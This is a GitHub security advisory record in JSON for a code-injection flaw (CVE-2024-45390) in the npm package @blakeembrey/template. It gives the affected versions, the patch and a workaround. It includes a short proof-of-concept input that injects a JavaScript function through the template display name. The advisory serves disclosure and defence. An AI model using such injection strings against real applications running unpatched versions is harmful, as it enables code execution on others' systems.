{"id":"GHSA-q765-wm9j-66qj","summary":"@blakeembrey/template vulnerable to code injection when attacker controls template input","details":"### Impact\n\nIt is possible to inject and run code within the template if the attacker has access to write the template name.\n\n```js\nconst { template } = require('@blakeembrey/template');\n\ntemplate(\"Hello {{name}}!\", \"exploit() {} && ((()=\u003e{ console.log('success'); })()) && function pwned\");\n```\n\n### Patches\n\nUpgrade to 1.2.0.\n\n### Workarounds\n\nDon't pass untrusted input as the template display name, or don't use the display name feature.\n\n### References\n\nFixed by removing in https://github.com/blakeembrey/js-template/commit/b8d9aa999e464816c6cfb14acd1ad0f5d1e335aa.","aliases":["CVE-2024-45390"],"modified":"2024-11-18T16:27:09Z","published":"2024-09-03T19:42:25Z","database_specific":{"github_reviewed_at":"2024-09-03T19:42:25Z","nvd_published_at":"2024-09-03T20:15:08Z","cwe_ids":["CWE-94"],"severity":"MODERATE","github_reviewed":true},"references":[{"type":"WEB","url":"https://github.com/blakeembrey/js-template/security/advisories/GHSA-q765-wm9j-66qj"},{"type":"ADVISORY","url":"https://nvd.nist.gov/vuln/detail/CVE-2024-45390"},{"type":"WEB","url":"https://github.com/blakeembrey/js-template/commit/b8d9aa999e464816c6cfb14acd1ad0f5d1e335aa"},{"type":"PACKAGE","url":"https://github.com/blakeembrey/js-template"}],"affected":[{"package":{"name":"@blakeembrey/template","ecosystem":"npm","purl":"pkg:npm/%40blakeembrey/template"},"ranges":[{"type":"SEMVER","events":[{"introduced":"0"},{"fixed":"1.2.0"}]}],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/09/GHSA-q765-wm9j-66qj/GHSA-q765-wm9j-66qj.json"}}],"schema_version":"1.9.0","severity":[{"type":"CVSS_V3","score":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L"},{"type":"CVSS_V4","score":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N"}]}